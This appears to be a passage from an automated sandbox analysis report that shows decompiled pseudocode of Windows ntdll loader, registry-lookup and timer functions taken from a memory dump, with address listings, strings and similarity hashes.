                          0x048888b0
                          0x048888b2
                          0x048888d3
                          0x048888d5
                          0x00000000
                          0x048888d7
                          0x048888db
                          0x048888dc
                          0x048888e0
                          0x048888e8
                          0x048888ee
                          0x048888f0
                          0x048888f3
                          0x048888fc
                          0x04888901
                          0x04888906
                          0x0488890c
                          0x0488890c
                          0x0488890f
                          0x04888916
                          0x04888917
                          0x04888918
                          0x04888919
                          0x0488891a
                          0x0488891f
                          0x04888921
                          0x048d9c52
                          0x048d9c55
                          0x048d9c5b
                          0x048d9cac
                          0x048d9cc0
                          0x048d9cc0
                          0x048d9c55
                          0x04888927
                          0x04888927
                          0x0488892f
                          0x04888933
                          0x00000000
                          0x048888f5
                          0x048888f5
                          0x00000000
                          0x048888f7
                          0x048888f7
                          0x048888fa
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048888fa
                          0x048888f5
                          0x048888f3
                          0x00000000
                          0x048888d5
                          0x00000000
                          0x048888b2
                          0x048888c9
                          0x00000000
                          0x048888c9
                          0x0488887f
                          0x0488886a
                          0x04888857
                          0x04888852
                          0x048888bf
                          0x048888bf
                          0x048887aa
                          0x048887ad
                          0x048887ae
                          0x048887b4
                          0x048887b5
                          0x048887b6
                          0x048887b8
                          0x048887bd
                          0x048887c1
                          0x048887f4
                          0x048887fa
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048887c1
                          0x00000000

                          Strings
                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 048D9C18
                          • minkernel\ntdll\ldrsnap.c, xrefs: 048D9C28
                          • LdrpDoPostSnapWork, xrefs: 048D9C1E
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                          • API String ID: 0-1948996284
                          • Opcode ID: 9df467f2f6adacd8e8edc1f97cdbe58c189716a19adbc653ae2e283663299bdf
                          • Instruction ID: 0231b286b3b583154e2d93bd22c8a089999f42d0ce2283771764f9033cd75dcc
                          • Opcode Fuzzy Hash: 9df467f2f6adacd8e8edc1f97cdbe58c189716a19adbc653ae2e283663299bdf
                          • Instruction Fuzzy Hash: 5E91F171A0020AEFEB18FF59C880ABAB7B5FF44354B854A6DD905EB250E770BD01DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04887E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E04887E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0488CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0487C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x4965780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E048F5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x4965780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04897D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04897D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E048F7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04897D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04897D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E048F7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E048AA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0487B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                          0x04887e4c
                          0x04887e50
                          0x04887e55
                          0x04887e58
                          0x04887e5d
                          0x04887e71
                          0x04887f33
                          0x04887e77
                          0x04887e77
                          0x04887e79
                          0x04887e79
                          0x04887e7e
                          0x04887f45
                          0x048d9848
                          0x00000000
                          0x048d9848
                          0x04887f4e
                          0x04887f53
                          0x04887f5a
                          0x00000000
                          0x00000000
                          0x048d985a
                          0x048d9862
                          0x048d9866
                          0x00000000
                          0x048d986c
                          0x00000000
                          0x048d986c
                          0x04887e84
                          0x04887e84
                          0x04887e8d
                          0x048d9871
                          0x04887eb8
                          0x04887ec0
                          0x04887ec0
                          0x04887e9a
                          0x048d987e
                          0x00000000
                          0x00000000
                          0x048d9884
                          0x048d988b
                          0x048d98a7
                          0x048d98ac
                          0x048d98b1
                          0x048d98b6
                          0x048d98b8
                          0x048d98b8
                          0x048d98b9
                          0x00000000
                          0x048d98b9
                          0x04887ea0
                          0x04887ea7
                          0x00000000
                          0x00000000
                          0x04887eac
                          0x04887eb1
                          0x04887ec6
                          0x04887ed0
                          0x048d98cc
                          0x04887ed6
                          0x04887ed6
                          0x04887ed6
                          0x04887ede
                          0x04887ee3
                          0x048d98e3
                          0x048d98f0
                          0x048d9902
                          0x048d98f2
                          0x048d98fb
                          0x048d98fb
                          0x048d9907
                          0x048d991d
                          0x048d991d
                          0x048d9907
                          0x048d98e3
                          0x04887ef0
                          0x04887f14
                          0x04887f14
                          0x04887f1e
                          0x048d9946
                          0x04887f24
                          0x04887f24
                          0x04887f24
                          0x04887f2c
                          0x048d996a
                          0x048d9975
                          0x048d9975
                          0x048d997e
                          0x048d9993
                          0x048d9993
                          0x048d997e
                          0x00000000
                          0x04887ef2
                          0x04887efc
                          0x04887f0a
                          0x04887f0e
                          0x048d9933
                          0x00000000
                          0x048d9933
                          0x00000000
                          0x04887f0e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x04887eb1

                          Strings
                          • Could not validate the crypto signature for DLL %wZ, xrefs: 048D9891
                          • LdrpCompleteMapModule, xrefs: 048D9898
                          • minkernel\ntdll\ldrmap.c, xrefs: 048D98A2
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                          • API String ID: 0-1676968949
                          • Opcode ID: cc2e4e1fafcb9408466ee0ae7c9122508d1da2f7644d95f9a754453e05d409fd
                          • Instruction ID: 36edf3b6a1aa09bcd4564ed53bc53c84644f1902cb497ea38ce9f6990ae44522
                          • Opcode Fuzzy Hash: cc2e4e1fafcb9408466ee0ae7c9122508d1da2f7644d95f9a754453e05d409fd
                          • Instruction Fuzzy Hash: CC51E071A017449BEB21DB58CD84B2ABBF4AB40B18F240FA9E951DB791D774FD00CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0487E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E0487E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0487F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E048B95D0();
						}
						if(_t78 != 0) {
							L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E048BFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E048BBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E048B9600();
					if(_t97 < 0) {
						goto L6;
					}
					E048BBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0487F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E048BBB40(_t83, _t102 + 0x24, _t78);
								if(L048843C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E048BBB40(_t84, _t102 + 0x24, _t94);
									if(L048843C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                          0x0487e620
                          0x0487e628
                          0x0487e62f
                          0x0487e631
                          0x0487e635
                          0x0487e637
                          0x0487e63e
                          0x048d5503
                          0x048d5503
                          0x0487e64c
                          0x0487e64c
                          0x0487e651
                          0x00000000
                          0x00000000
                          0x0487e661
                          0x0487e665
                          0x048d542a
                          0x0487e715
                          0x0487e71a
                          0x0487e71c
                          0x0487e720
                          0x0487e720
                          0x0487e727
                          0x0487e736
                          0x0487e736
                          0x0487e743
                          0x0487e743
                          0x0487e673
                          0x0487e678
                          0x0487e67d
                          0x0487e682
                          0x0487e685
                          0x0487e692
                          0x0487e69b
                          0x0487e6a3
                          0x0487e6ad
                          0x0487e6b1
                          0x0487e6b2
                          0x0487e6bb
                          0x0487e6bf
                          0x0487e6c0
                          0x0487e6c8
                          0x0487e6cc
                          0x0487e6d5
                          0x0487e6d9
                          0x00000000
                          0x00000000
                          0x0487e6e5
                          0x0487e6ea
                          0x0487e6f9
                          0x0487e70b
                          0x0487e70f
                          0x048d5439
                          0x048d545e
                          0x048d545e
                          0x00000000
                          0x048d545e
                          0x048d543b
                          0x048d543e
                          0x048d5440
                          0x048d5445
                          0x048d5472
                          0x048d5475
                          0x048d548d
                          0x048d5493
                          0x048d54a9
                          0x00000000
                          0x00000000
                          0x048d54ab
                          0x048d54b4
                          0x048d54bc
                          0x048d54c8
                          0x048d54de
                          0x048d54fb
                          0x048d54e0
                          0x048d54e6
                          0x048d54eb
                          0x048d54eb
                          0x048d54de
                          0x00000000
                          0x048d54bc
                          0x048d5477
                          0x048d547a
                          0x048d5480
                          0x048d5483
                          0x048d5486
                          0x048d548b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048d548b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048d5447
                          0x048d5447
                          0x048d5447
                          0x048d5447
                          0x048d544e
                          0x00000000
                          0x00000000
                          0x048d5450
                          0x048d5452
                          0x048d5455
                          0x048d545a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048d545c
                          0x048d546a
                          0x048d546d
                          0x048d546f
                          0x00000000
                          0x048d546f
                          0x0487e70f

                          Strings
                          • @, xrefs: 0487E6C0
                          • InstallLanguageFallback, xrefs: 0487E6DB
                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0487E68C
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                          • API String ID: 0-1757540487
                          • Opcode ID: 073e4e0e432649335d5589a99fb560a86e2c3e1a3044ac7c5e8672e04620fd9a
                          • Instruction ID: 3e2126de36f68517a6272718e03361ffc8dc0ea6db5435817fc16a25d35ced85
                          • Opcode Fuzzy Hash: 073e4e0e432649335d5589a99fb560a86e2c3e1a3044ac7c5e8672e04620fd9a
                          • Instruction Fuzzy Hash: D551AFB2505355ABD710DF28C450AABB3E9AF88758F440E6EF985D7240F774EA0487A3
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0489B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                          Download Yara Rule
                          C-Code - Quality: 76%
                          			E0489B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x496d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04897D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04948CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E048B9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E048BB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E048BCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04897D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04948F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E048BAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4968628; // 0x0
								_v68 = _t77;
								_t78 =  *0x496862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4968628; // 0x0
							_t116 =  *0x496862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                          0x0489b94c
                          0x0489b956
                          0x0489b95c
                          0x0489b95e
                          0x0489b964
                          0x0489b969
                          0x0489b96d
                          0x0489b96d
                          0x0489b970
                          0x0489b974
                          0x0489b97a
                          0x0489badf
                          0x0489badf
                          0x0489bae2
                          0x0489bae4
                          0x0489bae6
                          0x0489baf0
                          0x048e2cb8
                          0x0489baf6
                          0x0489baf6
                          0x0489baf6
                          0x0489bafd
                          0x0489bb1f
                          0x0489bb1f
                          0x0489baff
                          0x0489bb00
                          0x0489bb00
                          0x0489bb03
                          0x0489bb03
                          0x0489bacb
                          0x0489bacf
                          0x0489bad0
                          0x0489bad1
                          0x0489badc
                          0x0489badc
                          0x0489b980
                          0x0489b980
                          0x0489b988
                          0x0489b98b
                          0x0489b98d
                          0x0489b990
                          0x0489b993
                          0x0489b999
                          0x0489b99b
                          0x0489b9a1
                          0x0489b9a5
                          0x0489b9aa
                          0x0489b9b0
                          0x0489b9bb
                          0x0489b9c0
                          0x0489b9c3
                          0x0489b9ca
                          0x0489b9cc
                          0x0489b9cf
                          0x0489b9d3
                          0x0489b9d7
                          0x0489ba94
                          0x0489ba94
                          0x0489ba98
                          0x0489baa3
                          0x048e2ccb
                          0x0489baa9
                          0x0489baa9
                          0x0489baa9
                          0x0489bab1
                          0x048e2cd5
                          0x048e2cdd
                          0x048e2cdd
                          0x0489babb
                          0x0489babc
                          0x0489bac2
                          0x0489bac3
                          0x0489bac3
                          0x0489bac6
                          0x00000000
                          0x0489b9dd
                          0x0489b9dd
                          0x0489b9e7
                          0x0489b9e7
                          0x0489b9ec
                          0x0489b9ec
                          0x0489b9f1
                          0x0489b9f5
                          0x0489b9fa
                          0x0489ba00
                          0x0489ba0c
                          0x0489ba10
                          0x0489ba10
                          0x0489ba12
                          0x0489ba18
                          0x00000000
                          0x00000000
                          0x0489bb26
                          0x0489bb26
                          0x0489ba1e
                          0x0489ba1e
                          0x0489ba23
                          0x0489ba25
                          0x0489ba2c
                          0x0489ba30
                          0x0489ba35
                          0x0489ba35
                          0x0489ba41
                          0x0489ba46
                          0x0489ba4c
                          0x0489ba50
                          0x0489ba54
                          0x0489ba6a
                          0x0489ba6e
                          0x0489ba70
                          0x0489ba74
                          0x0489ba78
                          0x0489ba7a
                          0x0489ba7c
                          0x0489ba8e
                          0x0489ba90
                          0x0489ba92
                          0x0489bb14
                          0x0489bb14
                          0x0489bb16
                          0x0489bb16
                          0x00000000
                          0x0489ba7c
                          0x0489bb0a
                          0x0489bb0d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0489bb0f

                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0489B9A5
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 885266447-0
                          • Opcode ID: 1ecc047298b22748856a065aec25125f2272678156c0557e556063da0e8cc201
                          • Instruction ID: 9645a977ad5e6ee4f1a3d0d0a30d61977874182ad65c6afef37b693fb3635c11
                          • Opcode Fuzzy Hash: 1ecc047298b22748856a065aec25125f2272678156c0557e556063da0e8cc201
                          • Instruction Fuzzy Hash: C3512471A19B44CFCB20DF29D48092ABBE5BB88614F188E6EE585D7354E770FC44CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0487B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                          Download Yara Rule
                          C-Code - Quality: 78%
                          			E0487B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x494f7a8);
				E048CD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E048CD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E048BD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E048BF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L048CDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E048BB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
